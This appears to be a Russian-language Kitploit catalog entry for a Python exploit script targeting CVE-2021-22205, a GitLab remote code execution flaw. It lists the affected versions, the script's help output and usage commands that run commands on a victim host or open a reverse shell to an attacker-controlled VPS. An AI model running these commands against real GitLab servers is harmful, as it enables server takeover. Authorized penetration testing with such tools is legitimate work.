Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-22205 — Скрипт эксплойта на Python для CVE-2021-22205 (GitLab RCE) с возможностями выполнения команд и reverse shell. Поддерживает получение шелла в один клик для тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/keven1z/cve-2021-22205
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

Скрипт эксплойта на Python для CVE-2021-22205 (GitLab RCE) с возможностями выполнения команд и reverse shell. Поддерживает получение шелла в один клик для тестирования на проникновение.

Репозиторий
12314 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-22205

Из-за того, что GitLab неправильно проверяет файлы изображений, передаваемые парсеру, возникает выполнение команд. Злоумышленник может сконструировать вредоносный запрос и выполнить произвольные команды в целевой системе, что в итоге приводит к захвату сервера GitLab. Поскольку в большинстве скриптов в сети отсутствует функция реверс-шелла, был доработан существующий скрипт и добавлена функция одного выстрела для получения шелла.

Уязвимые версии

  • 11.9 <= GitLab (CE/EE) < 13.8.8
  • 13.9 <= GitLab (CE/EE) < 13.9.6
  • 13.10 <= GitLab (CE/EE) < 13.10.3

Инструкция по использованию

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            показать это сообщение и выйти
  -t TARGET, --target TARGET
                        Целевой URL
  -c COMMAND, --command COMMAND
                        Команда для выполнения
  --shell               Включить реверс-шелл
  -i IP, --ip IP        IP-адрес для реверс-шелла
  -p PORT, --port PORT  Порт для реверс-шелла

Использование

root@kitploit:~
python3 CVE-2021-22205.py -t [IP жертвы] --shell -i [IP VPS] -p [порт VPS] // реверс-шелл
python3 CVE-2021-22205.py -t [IP жертвы] -c [команда] // выполнить команду

Заявление

Данный скрипт предназначен только для тестирования, не используйте его в других целях.

Скачать инструмент